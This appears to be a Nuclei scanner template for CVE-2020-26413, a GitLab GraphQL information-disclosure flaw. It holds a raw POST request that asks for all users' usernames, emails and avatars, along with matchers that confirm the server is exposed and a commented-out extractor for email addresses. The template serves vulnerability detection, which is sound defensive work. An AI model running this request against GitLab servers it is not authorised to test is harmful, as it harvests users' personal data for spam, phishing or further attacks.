id: CVE-2020-26413

info:
  name: Gitlab User enumeration via Graphql API
  severity: medium
  description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.
  tags: gitlab

requests:
  - raw:
      - |
        POST /api/graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "query": "{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }",
          "variables": null,
          "operationName": null
        }
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"avatarUrl":'
          - '"node":'
        condition: and

      - type: status
        status:
          - 200

#    extractors:
#      - type: json
#        part: body
#        json:
#          - '.data.users.edges[].node.email'